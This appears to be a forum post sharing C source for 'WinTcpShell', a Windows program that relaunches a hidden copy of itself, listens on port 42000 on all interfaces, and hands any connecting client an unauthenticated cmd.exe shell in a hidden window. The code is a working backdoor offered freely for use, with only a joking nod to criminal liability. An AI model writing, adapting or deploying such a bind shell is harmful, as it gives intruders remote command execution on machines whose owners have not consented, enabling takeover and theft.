I couldn't find any Windows(TM) code that listened on a port and spawned a shell, so i wrote some./* * WinTcpShell * tcpshell.c * * cl tcpshell.c /link wsock32.lib Ws2_32.lib * * This code runs a copy of itself and then exits. * The copy that is left running in memory opens a port and * waits for a connection. * When a connection is made it runs cmd.exe with stdin, * stdout and stderr piped in and out of the socket. * This code is released into the public domain * with no restrictions other than Microsoft's copyrights * and patents and trademarks and criminal liabilities * that might apply. */
#include <sys\types.h> #include <winsock2.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <io.h>
#define LISTENQ SOMAXCONN
WSADATA WSAData; int status; int lsocket = 0; int csocket = 0; struct sockaddr_in laddr; struct sockaddr_in caddr;
int len;
STARTUPINFO si; PROCESS_INFORMATION pi; char spawn_cmd[] = "d:\\winnt\\system32\\cmd.exe"; char copy_command[] = ".\\tcpshell.exe copy";
int main(int argc, char *argv[]) {
printf("%d\nOh boy are we having fun now!\n", argc);
if ((status = WSAStartup(MAKEWORD(2, 0), &WSAData)) != 0) { perror("WSAStartup() error"); exit(1); }
while (1) {
if (argc > 1) {
if (!lsocket) {
if ( (lsocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0)) == INVALID_SOCKET) { printf("socket error: %0x", WSAGetLastError()); return (10); }
len = sizeof(laddr); memset(&laddr, 0, len); laddr.sin_addr.s_addr = htonl(INADDR_ANY); laddr.sin_family = AF_INET; laddr.sin_port = htons(42000); if ( (bind (lsocket, (const struct sockaddr *) &laddr, len))) { status = WSAGetLastError(); printf("bind error: %d\n", status); exit(1); }
if (listen(lsocket, LISTENQ)) { perror("listen error"); return (10); }
} len = sizeof(caddr); if ((csocket = accept(lsocket, &caddr, &len)) == INVALID_SOCKET) { perror("socket accept"); abort(); }
GetStartupInfo(&si); } else { csocket = 2; }
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; si.hStdOutput = csocket; si.hStdError = csocket; // set the new // handles // for the spawned // cmd.exe process si.hStdInput = csocket;
// spawn the socket listening copy of this // program // that is left // running in memory if (argc == 1) { if (!CreateProcess (NULL, copy_command, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("error in CreateProcess copy_command"); exit(1); } } // spawn the cmd.exe process that has stdin, // stdout, // and stderr piped // in and out of the socket if (argc > 1) { if (!CreateProcess (spawn_cmd, NULL, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("error in CreateProcess spawn_cmd"); exit(1); } }
if (argc == 1) { exit(0); }
} }